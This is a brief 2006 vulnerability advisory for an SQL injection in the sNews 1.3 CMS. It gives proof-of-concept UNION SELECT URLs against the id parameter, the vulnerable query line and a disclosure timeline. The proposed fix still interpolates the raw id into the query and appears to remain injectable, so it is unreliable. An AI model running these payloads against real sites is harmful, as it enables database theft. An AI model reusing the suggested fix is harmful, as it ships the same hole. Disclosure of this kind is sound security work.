Be-Paranoid.net

Be-Paranoid Advisory - 0001

Beschreibung

Quote:


Name: Be-Paranoid Advisory - 0001
Date: Feb, 2th, 2006
Product: sNews v1.3 (Nov, 12th, 2005)
--------------------------------------------

Description:
------------

sNews, a cool, tiny CMS is affected by a SQL injection attack. An attacker may get access to data of the database.

Proof Of Concept:
-----------------

The following URLs won't be filtered in line 301:

$Domain/sNews/index.php?id=2+UNION+SELECT+test,test,test,test,test,test,test,test,test,test,test FROM test_table
$Domain/sNews/index.php?id=2+UNION+SELECT+USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER(),USER()
$Domain/sNews/index.php?id=2+OR+image+=+0

Line 301:
$query = "SELECT * FROM " .s('prefix'). "articles WHERE id = $id";

There may exists other injections.

An unpublished article may also been shown:

$Domain/sNews/index.php?id=x

Vulnerable Versions:
--------------------

- sNews 1.3
- sNews 1.2 (line 41; functions.php)

Solutions:
----------

There is no patch available yet. It seems that the problems will bee fixed in 1.4. 1.4 beta is not affected.

You should change line 301 too:
$query = "SELECT * FROM `articles` LEFT OUTER JOIN categories ON(categories.id=articles.category) WHERE articles.id='$id' AND (articles.category = 0 OR categories.published = 1)";

Events:
-------

- 2006-02-12: Vulnerability discovered.
- 2006-02-13: Vendor contacted.

Credits:
--------

- The Author
- http://be-paranoid.net

PS:
---

This Problem has already been discovered by r0t an it's described in CVE-2005-3853 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3853). Damn, I'm too late.

Es ist kein Exploit vorhanden.

Versionen

Quellen